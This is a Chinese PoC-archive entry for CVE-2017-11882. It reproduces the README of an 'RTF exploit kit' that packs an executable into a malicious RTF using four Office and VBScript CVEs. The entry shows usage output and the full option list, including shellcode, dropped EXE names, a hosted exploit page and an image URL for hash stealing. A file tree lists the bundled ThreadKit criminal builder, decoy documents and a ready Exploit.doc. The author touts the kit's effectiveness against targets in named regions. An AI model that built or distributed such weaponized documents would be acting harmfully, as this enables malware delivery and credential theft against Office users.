关联漏洞
标题:
Microsoft Office 安全漏洞
(CVE-2017-11882)
描述:Microsoft Office 2007 SP3等都是美国微软(Microsoft)公司开发的办公软件套件产品。 Microsoft Office中存在远程代码执行漏洞,该漏洞源于程序没有正确的处理内存中的对象。远程攻击者可借助特制的文件利用该漏洞在当前用户的上下文中执行任意代码。以下版本受到影响:Microsoft Office 2007 SP3,Microsoft Office 2010 SP2,Microsoft Office 2013 SP1,Microsoft Office 2016。
描述
generate RTF exploit payload. uses cve-2017-11882, cve-2017-8570, cve-2018-0802, and cve-2018-8174.
介绍
My RTF exploit kit from a couple of years ago. You're on your own for AV
evasion. Still works well against certain targets. Especially in the Middle East, parts of Asia,
former Soviet bloc, etc.
Also included a copy of
the [threadkit](https://www.proofpoint.com/us/threat-insight/post/unraveling-ThreadKit-new-document-exploit-builder-distribute-The-Trick-Formbook-Loki-Bot-malware) exploit kit,
courtesy of [the
Russians](https://cyware.com/news/cobalt-gang-found-using-new-version-of-threadkit-exploit-kit-dubbed-cobint-e523901f/).
<3
rtfkit takes an executable and packs it into an RTF with some public pre-compiled exploits.
Usage
=====
Basically this:
$ ./generate_rtf.py -p artifact.exe --out payload.rtf
[+] adding exploit equation1 (cve-2017-11882)
[+] adding exploit equation2 (cve-2018-0802)
[+] adding exploit composite (cve-2017-8570)
[.] writing rtf to payload.rtf
Full usage:
usage: generate_rtf.py [-h] [-D] [-l] [-u USE] [--use-cve USE_CVE]
[--exe-name EXE_NAME] [--template TEMPLATE]
[--fake-path FAKE_PATH] [-o OUT]
[--king-shellcode KING_SHELLCODE] [--king-url KING_URL]
[--king-html-out KING_HTML_OUT]
[--composite-sct COMPOSITE_SCT]
[--image-track IMAGE_TRACK] [-p PACKAGE]
optional arguments:
-h, --help show this help message and exit
-D, --debug enable debug
-l, --list list exploits and additions
-u USE, --use USE add exploit (see --list)
--use-cve USE_CVE add exploit (by CVE)
--exe-name EXE_NAME name for dropped EXE file (for exploits equation and
composite)
--template TEMPLATE RTF template to add exploit to (default:
resources/blank.rtf)
--fake-path FAKE_PATH
fake path for packaged files (default: C:\Drivers)
-o OUT, --out OUT RTF output
king exploit:
King exploit (CVE-2018-8174) options
--king-shellcode KING_SHELLCODE
shellcode for CVE-2018-8174 (default:
resources/rtf_winexec.bin)
--king-url KING_URL URL where HTML will be hosted for king exploit (max:
39 chars)
--king-html-out KING_HTML_OUT
output file for king HTML
composite exploit:
Composite moniker exploit (CVE-2017-8570) options
--composite-sct COMPOSITE_SCT
use this SCT file instead of generating one
additions:
Additional things to add to the RTF
--image-track IMAGE_TRACK
include an image from this URL, for tracking and hash
stealing
-p PACKAGE, --package PACKAGE
files to add as packages. will by dropped in temp
(append fake name with colon)
文件快照
[4.0K] /data/pocs/fd392ea45cd36ac245feb5cfa0ad7252faf95458
├── [4.0K] exploits
│ ├── [5.9K] composite.py
│ ├── [ 13K] CVE-2018-8174.rb
│ ├── [ 24K] equation.py
│ ├── [ 0] __init__.py
│ ├── [ 107] __init__.pyc
│ ├── [2.1K] king.py
│ ├── [ 497] king.pyc
│ └── [4.0K] templates
│ ├── [ 450] composite.sct
│ ├── [8.5K] CVE-2018-8174.html
│ └── [5.1K] CVE-2018-8174.rtf
├── [9.9K] generate_rtf.py
├── [3.0K] README.md
├── [4.0K] resources
│ ├── [ 41K] blank.rtf
│ ├── [ 285] make_rtf_winexec.sh
│ ├── [ 550] rtf_winexec.bin
│ └── [213K] wordlist.txt
├── [2.9K] rtf_package.py
├── [4.0K] threadkit
│ ├── [4.0K] analysis
│ │ ├── [ 44K] builder_patched.py
│ │ ├── [6.2K] builder.py
│ │ ├── [ 92] build_with_dll.bat
│ │ ├── [ 92] build_with_exe.bat
│ │ ├── [ 95] build_with_exe.sh
│ │ ├── [4.0K] commands
│ │ │ ├── [2.2K] dll.bat
│ │ │ ├── [1.5K] exe.bat
│ │ │ ├── [ 488] scriptlet.sct
│ │ │ └── [ 171] task.bat
│ │ ├── [ 32K] decoy.doc
│ │ ├── [ 68K] dll.dll
│ │ ├── [ 49K] enable_editing.jpg
│ │ ├── [ 68K] exe.exe
│ │ ├── [3.1K] hta
│ │ ├── [1.1K] inner.php
│ │ ├── [ 172] key.txt
│ │ ├── [ 520] notes
│ │ ├── [2.4K] packager.py
│ │ ├── [2.6K] packager.pyc
│ │ ├── [1.6K] ReadMe_ENG.txt
│ │ ├── [2.9K] ReadMe_RU.txt
│ │ ├── [4.0K] ready_exploit
│ │ │ ├── [318K] Exploit.doc
│ │ │ └── [313K] part_Decoded
│ │ ├── [ 151] server2_content.py
│ │ ├── [ 37K] server_code.py
│ │ ├── [ 16K] template
│ │ └── [8.7K] t.php
│ ├── [4.0K] edit
│ │ ├── [7.4K] builder.py
│ │ ├── [ 92] build_with_dll.bat
│ │ ├── [ 92] build_with_exe.bat
│ │ ├── [ 74] build_with_exe.sh
│ │ ├── [4.0K] commands
│ │ │ ├── [2.2K] dll.bat
│ │ │ ├── [1.5K] exe.bat
│ │ │ ├── [ 488] scriptlet.sct
│ │ │ └── [ 171] task.bat
│ │ ├── [ 32K] decoy.doc
│ │ ├── [ 68K] dll.dll
│ │ ├── [ 49K] enable_editing.jpg
│ │ ├── [ 68K] exe.exe
│ │ ├── [ 172] key.txt
│ │ ├── [7.4K] nonet.py
│ │ ├── [2.4K] packager.py
│ │ ├── [2.6K] packager.pyc
│ │ ├── [1.6K] ReadMe_ENG.txt
│ │ ├── [2.9K] ReadMe_RU.txt
│ │ └── [4.0K] ready_exploit
│ │ └── [318K] Exploit.doc
│ └── [4.0K] newline
│ ├── [6.1K] builder.py
│ ├── [ 92] build_with_dll.bat
│ ├── [ 92] build_with_exe.bat
│ ├── [4.0K] commands
│ │ ├── [2.2K] dll.bat
│ │ ├── [1.5K] exe.bat
│ │ ├── [ 488] scriptlet.sct
│ │ └── [ 171] task.bat
│ ├── [ 32K] decoy.doc
│ ├── [ 68K] dll.dll
│ ├── [ 49K] enable_editing.jpg
│ ├── [ 68K] exe.exe
│ ├── [ 172] key.txt
│ ├── [2.4K] packager.py
│ ├── [2.6K] packager.pyc
│ ├── [1.6K] ReadMe_ENG.txt
│ └── [2.9K] ReadMe_RU.txt
└── [3.0K] utils.py
12 directories, 80 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。